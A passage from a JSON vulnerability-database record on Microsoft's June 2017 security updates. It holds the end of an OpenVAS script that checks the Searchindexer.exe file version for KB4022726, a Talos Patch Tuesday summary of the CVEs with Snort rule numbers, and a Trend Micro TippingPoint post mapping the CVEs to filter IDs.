script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022726\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in importing printer drivers and get errors with error code\n 0x80070bcb.\n\n - The mouse input can cease to function. The mouse pointer may continue\n to move, but movements and clicks produce no response other than a\n beeping noise.\n\n - An error in printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - An error in unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Multiple issue in Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to gain\n the same user rights as the current user and to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022726\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.9600.18722\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.9600.18722\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "description": "Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.<br /><br /><a name='more'></a><br /><h3 id=\"h.hv5a65yfsbxp\">Vulnerabilities Rated Critical</h3><h4 id=\"h.wfa2xeyn8j0o\">CVE-2017-0283</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.<br /><h4 id=\"h.pd0tltwr72p2\">CVE-2017-0291 / CVE-2017-0292</h4>These are remote code execution vulnerability in Microsoft Windows if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.<br /><h4 id=\"h.hv36855sqvlr\">CVE-2017-0294</h4>This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user to open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.<br /><h4 id=\"h.diewipjyn91o\">CVE-2017-8464</h4>This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.<br /><h4 id=\"h.wbb780pr8m8i\">CVE-2017-8496 / CVE-2017-8497</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.<br /><h4 id=\"h.1z06wiwr79tf\">CVE-2017-8499</h4>This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted websites.<br /><h4 id=\"h.i1b4odd02i18\">CVE-2017-8517</h4>This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker gaining taking full control of the affected system.<br /><h4 id=\"h.3l2zoggepikn\">CVE-2017-8520</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.hirfaaudj8y2\">CVE-2017-8522</h4>This is a remote code execution vulnerability in the way the Javascript engines render when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.xpxmg2ydkif2\">CVE-2017-8524</h4>This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.<br /><h4 id=\"h.j0uggxwjmgay\">CVE-2017-8527</h4>This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.<br /><h4 id=\"h.a2u2lz7ol3bu\">CVE-2017-8528</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.<br /><h4 id=\"h.bx2hk4byyp0\">CVE-2017-8543</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.pdkn0478ls9v\">CVE-2017-8548 / CVE-2017-8549</h4>These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. This can be exploited by having a user viewing a specially crafted website.<br /><h3 id=\"h.gpoya8yq4g7y\">Vulnerabilities Rated as Important</h3><h4 id=\"h.2bzwegrsdvuh\">CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219</h4>These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.<br /><h4 id=\"h.fbwxsdtpm92q\">CVE-2017-0193</h4>This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.<br /><h4 id=\"h.e4h7wyh0j9ao\">CVE-2017-0260 / CVE-2017-8506</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted office document and can result in the attacker gaining full control of the affected system.<br /><h4 id=\"h.d0s8jre8ln5i\">CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285</h4>This is an information disclosure vulnerability in Windows Uniscribe related to improper disclosure of the contents of its memory. This can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.bo1p344p5bt2\">CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289</h4>These are information disclosure vulnerabilities in the Windows GDI functionality that results in disclosure of the contents of memory. This can be exploited by a user opening a specially crafted document or convincing a user to access an untrusted webpage.<br /><h4 id=\"h.rc19ikpi9rkx\">CVE-2017-0295</h4>This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.<br /><h4 id=\"h.ukhf4bu3xpr9\">CVE-2017-0296</h4>This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.9qf2te7i5b1f\">CVE-2017-0297</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.lotk64hjlvjg\">CVE-2017-0298</h4>This is a privilege escalation vulnerability in the Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to improperly authenticate a client. Exploitation occurs by an attacker that is logged into the system and executed a specially crafted application that would exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.<br /><h4 id=\"h.v8sfr1cbca79\">CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.<br /><h4 id=\"h.tyo4moefstll\">CVE-2017-8460</h4>This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.<br /><h4 id=\"h.wflwqpqh38w8\">CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468</h4>These are use-after-free vulnerability that can result in privilege escalation. This is specifically triggered when the Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.<br /><h4 id=\"h.loqaz6h61hfq\">CVE-2017-8469 / CVE-2017-8470</h4>This is an information disclosure vulnerability related to the way the Windows kernel improperly initializes objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.ahczr2jz5r7j\">CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.r3dx3kkvmfcz\">CVE-2017-8493</h4>This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.<br /><h4 id=\"h.p3llcf1m8rq5\">CVE-2017-8494</h4>This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.6462oxbspxq3\">CVE-2017-8507</h4>This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.<br /><h4 id=\"h.y14yeg9hmtps\">CVE-2017-8508</h4>This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.<br /><h4 id=\"h.kqtny2lmhpy4\">CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513</h4>These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.<br /><h4 id=\"h.o1ru3izc54qs\">CVE-2017-8514</h4>This is a reflective cross site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. The request could be delivered via both email message or through a specially crafted URL on a website.<br /><h4 id=\"h.3mlt339eyw7b\">CVE-2017-8515</h4>This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.<br /><h4 id=\"h.z2c1qk9dh3d8\">CVE-2017-8519</h4>This is a remote code execution vulnerability in Internet Explorer related to the objects in memory are improperly accessed. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.mv8eybhqa5pd\">CVE-2017-8521</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.5ffctj19wxm5\">CVE-2017-8523</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.g14jbgu5zebf\">CVE-2017-8529</h4>This is an information disclosure vulnerability that targets both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.<br /><h4 id=\"h.e6il8xov2qu5\">CVE-2017-8530</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.yo9w4ohnsd64\">CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533</h4>These are information disclosure vulnerabilities in the Windows CDI component related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.i2sjbys230jf\">CVE-2017-8534</h4>This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document of having them visit an untrusted webpage.<br /><h4 id=\"h.1jm00kmnvkvp\">CVE-2017-8544</h4>This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.x5xrllpbrgrq\">CVE-2017-8545</h4>This is a spoofing vulnerability in Microsoft Office for Mac related to the improper sanitization of html or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.<br /><h4 id=\"h.vm3l0n9yt3yj\">CVE-2017-8547</h4>This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.<br /><h4 id=\"h.ifsntniixnev\">CVE-2017-8550</h4>This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business of Lync context including opening a web page using the default browser or opening another messaging session with another user. Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.<br /><h4 id=\"h.5idaqenq3iuk\">CVE-2017-8551</h4>This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.<br /><h4 id=\"h.dazxtzgr79i4\">CVE-2017-8555</h4>This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.<br /><h3 id=\"h.x43pguv8bvah\">Coverage</h3>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />17042<br />24500<br />43155-43166<br />43169-43176<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtF1o6PBkRM:WE1LfzY7Ugo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtF1o6PBkRM\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-06-13T13:48:00", "title": "Microsoft Patch Tuesday - June 2017", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8499", "CVE-2017-8506", "CVE-2017-8507", "CVE-2017-8508", "CVE-2017-8509", "CVE-2017-8510", "CVE-2017-8511", "CVE-2017-8512", "CVE-2017-8513", "CVE-2017-8514", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8545", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8550", "CVE-2017-8551", "CVE-2017-8553", "CVE-2017-8555"], "modified": "2017-06-13T20:50:20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html", "id": "TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-06-27T11:16:56", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided \nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Trend Micro (5)_**\n\n| \n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "cvss3": {}, "published": "2017-06-16T12:00:40", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", 